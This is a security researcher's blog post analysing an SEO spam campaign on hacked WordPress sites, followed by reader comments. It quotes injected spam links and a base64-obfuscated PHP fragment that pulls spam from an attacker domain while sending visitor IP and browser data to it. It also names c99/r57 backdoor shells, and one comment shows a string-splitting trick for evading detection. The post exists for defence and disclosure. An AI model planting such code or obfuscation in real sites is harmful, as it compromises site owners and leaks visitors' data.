SEO SPAM network – Code used and more details

Lately we have been talking a lot about WordPress sites getting hacked with SEO Spam:

1-SEO SPAM network – Details of the wp-includes infection
2-It is not over – SEO Spam on sites infected

Some big sites got infected and the common complain I hear is that even after they clean up the SPAM, it just “magically” reappears after a few days.

Infection and analysis

*This is important: The latest version of WordPress (2.9.2) is not vulnerable, but if you took a while to upgrade, your site might have been hacked in the past and they left a backdoor hanging in there. So you need to find where it is.

We are seeing three attack behaviors:

1-SPAM is added to all the pages. This is generally done by infecting the wp-blog-header.php or the footer.php inside the templates.
2-SPAM is not visible in the main pages and only added inside the wp-includes.
3-Backdoors are left by the attackers (very common).

When SPAM is added to all the pages, it is easy to spot. If you do a “view” source on your site, you will see lots of links at the bottom:

<a href="http://www.bbc.th.edu/phpBB/language/lang_thai/email/request.php?p=rezeptfreie-potenzmittel<br  />medikamente rezeptfrei medikamente rezeptfrei
<a href="http://www.bbc.th.edu/phpBB/language/lang_thai/email/request.php?p=super-kamagra-billig-kaufen;
super kamagra billig kaufen
<a href=">
super kamagra billig kaufen
<a href="http://www.bbc.th.edu/phpBB/language/lang_thai/email/request.php?p=viagra-kaufen-in-hamburg
kaufen viagra<br  />..<br  /><a href=">
kaufen viagra ..

Our scanner also detects it pretty easily.

When the SPAM is not visible, the easiest way to find them is by doing Google searches using your domain name + SPAM keywords. We explain it in detail here.

Finding the backdoors is a bit more tricky. On most of the cases, we are seeing them hidden inside these places:

-wp-content/uploads – Search for .php files
-wp-includes/index.php or inside wp-includes/js – Search for .php files

However, they can be anywhere. My recommendation is that you download all your files to your desktop and do a mass search for “eval(base64_decode” or large strings inside PHP files. Using an AV will also help to find everything.

Code being used

The code being used to serve the SPAM is this one: http://sucuri.net/malware/entry/MW:SPAM:PH23 or sometimes this one (in the case of the .files directory).

We are seeing a lots of sites reading the “orders” from this domain: http://dvc44ftgr.com. It is hidden inside the code using base64 encoding:

$RAF63EAA7A2D15CA59ABB95B6FD1AFEBF=
"http://".base64_decode("ZHZjNDRmdGdyLmNvbQ==")."/links
/".rand(0,250).".txt?ip=".$_SERVER["REMOTE_ADDR"]."&
host=".rawurlencode($_SERVER["HTTP_HOST"])."&
agent=".rawurlencode($_SERVER["HTTP_USER_AGENT"]);

Plus, this domain is full of spammy sub-domains: citect-software.dvc44ftgr.com, jobs-mississauga.dvc44ftgr.com, trigonometry-calculate.dvc44ftgr.com, download-pinball.dvc44ftgr.com, etc, etc.

For the backdoors, they are using simple variations of the c99 (or the r57) PHP shells. You can see some of them in our blacklist database: f57, c99, etc.

If anyone have more information, let us know.

If your site is hacked (or with malware) and you need help, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://bourgy.com Bourgy

    These guys are becoming more and more sophisticated it seems

  • guaka

    I've seen some code like $y = 'base'.'6';$y.= '4_d'.'ecode'; – making it way harder to detect.